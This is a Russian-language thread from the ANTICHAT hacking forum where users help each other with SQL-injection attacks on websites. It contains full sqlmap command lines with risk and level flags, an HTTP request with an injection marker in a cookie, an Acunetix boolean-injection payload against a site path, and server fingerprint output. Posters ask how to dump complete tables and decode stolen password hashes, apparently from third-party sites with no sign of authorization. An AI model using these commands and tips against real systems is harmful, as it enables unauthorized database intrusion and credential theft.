ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.02.2016, 17:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
11851
Репутация:
30
|
|
Сообщение от Octavian
Octavian said:
↑
GET /ad.php HTTP/1.1
Cookie: banner_xxx9=1; auth=hjefu7sci3os9heqgejp6f7gr2; lang=ru; rabotamd_ad=* SQL injection; banner=1; popup=1; pre_lang=ru; PHPSESSID=avqgopd70kth9gnhbutrj3qhu3; user_id=hjefu7sci3os9heqgejp6f7gr2; _ga=GA1.2.475953970.1455644353; _gat=1; FTID=1Mms8o1x-pLR1Mms8o; FTID=1Mms8o1x-pLR1Mms8o
что делать так нехочет
-r "C:\Users\doina\Desktop\88.txt" --eta --risk=3 --level=5 -dbs -u "site.com/ad.php" --cookie="rabotamd_ad= *" --level=5 --random-agent
|
|
|
|
19.02.2016, 23:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
65956
Репутация:
0
|
|
У меня сразу два вопроса)
1)Хавиж показывает что в базе 40к строк,ставлю мапом на дамп - дампит только 400 строк и все!Как с этим бороться?
2)Почему иногда мап при дампе выдает пустоту не Null а просто пустая строчка- как с этим бороться?
|
|
|
|
20.02.2016, 00:13
|
|
Новичок
Регистрация: 23.07.2009
Сообщений: 25
Провел на форуме:
92307
Репутация:
0
|
|
Не получается слить пароли в нормальной кодировке, получаются вот такие:
[CODE]
Code:
+------------------------------------------+
| Password |
+------------------------------------------+
| \x00\x07\x8ccï\x8e\x1c°\x12\x1a\x89ÂÁr£¾ |
| \x00\t@ ÜáZ+Sxô\x0c\x82Ùp |
| \x00\x12\x87T\x9az¸ã
|
|
|
20.02.2016, 17:10
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
4776
Репутация:
0
|
|
[QUOTE="demontager"]
demontager said:
↑
Не получается слить пароли в нормальной кодировке, получаются вот такие:
[CODE]
Code:
+------------------------------------------+
| Password |
+------------------------------------------+
| \x00\x07\x8ccï\x8e\x1c°\x12\x1a\x89ÂÁr£¾ |
| \x00\t@ ÜáZ+Sxô\x0c\x82Ùp |
| \x00\x12\x87T\x9az¸ã |
|
|
|
20.02.2016, 17:43
|
|
Новичок
Регистрация: 23.07.2009
Сообщений: 25
Провел на форуме:
92307
Репутация:
0
|
|
Так не хочет
Код:
Code:
[15:40:30] [CRITICAL] switch '--no-cast' is incompatible with switch '--hex'
Параметры сервера рапортует такие
Код:
Code:
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0
|
|
|
|
26.02.2016, 03:19
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
4776
Репутация:
0
|
|
Ребят подскажите пожалуйста
В чем отличие ,если дампить с ключами -D olololo -T ololol -C username,password and etc --dump , сливает как обычно ,с небольшой скоростью
А если пробывать через --sql-shell с командами select * from ololol.ololol сливает все таблицу за пару секунд ,получалось такое на пару сайтов .Вот и хотелось бы узнать в чем отличие
|
|
|
|
27.02.2016, 09:46
|
|
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928
Репутация:
438
|
|
Сообщение от Xsite
Xsite said:
↑
Ребят подскажите пожалуйста
В чем отличие ,если дампить с ключами -D olololo -T ololol -C username,password and etc --dump , сливает как обычно ,с небольшой скоростью
А если пробывать через --sql-shell с командами select * from ololol.ololol сливает все таблицу за пару секунд ,получалось такое на пару сайтов .Вот и хотелось бы узнать в чем отличие странный вопрос, во втором случае по факту прямой доступ к бд и одним запросом ты берешь все хотя и могут быть ограничения, а в первом тянется все кучей запросов последовательно
|
|
|
|
28.02.2016, 17:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
1012
Репутация:
0
|
|
Сообщение от ol1ver
ol1ver said:
↑
Раз и вдруг sqlmap перестал работать. На ввод команд не реагирует. С Python все нормально, ничего не переносил. С АВ sqlmap дружил.
 лол на окнах извините, я использую переводчика
|
|
|
|
28.02.2016, 17:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
1012
Репутация:
0
|
|
Сообщение от powerOfthemind
powerOfthemind said:
↑
sqlmap работает с XPATH syntax error ? нет, но вы можете легко написать инъекции XPATH, если вы знаете язык сценариев и базы данных, если это SOAP вебсервис вы можете использовать библиотеку как handsoap и написать несколько полезных нагрузок вне для конкретной базы данных и запустить скрипт для приложений веб-вам безопасность на самом деле что-нибудь большой без какой-либо возможности программирования не может сделать.
|
|
|
|
01.03.2016, 16:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
65956
Репутация:
0
|
|
Как раскрутить такую скулю?
site.ru/v2-live-with-a-5-1-win/
Acunetix:
Path Fragment (suffix /) input - was set to success' AND 3*2*1=6 AND '000CDY9'='000CDY9
site.ru/v2-live-with-a-5-1-win'%20AND%203*2*1%3d6%20AND%20'000SgxW'%3d'000Sgx W/
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
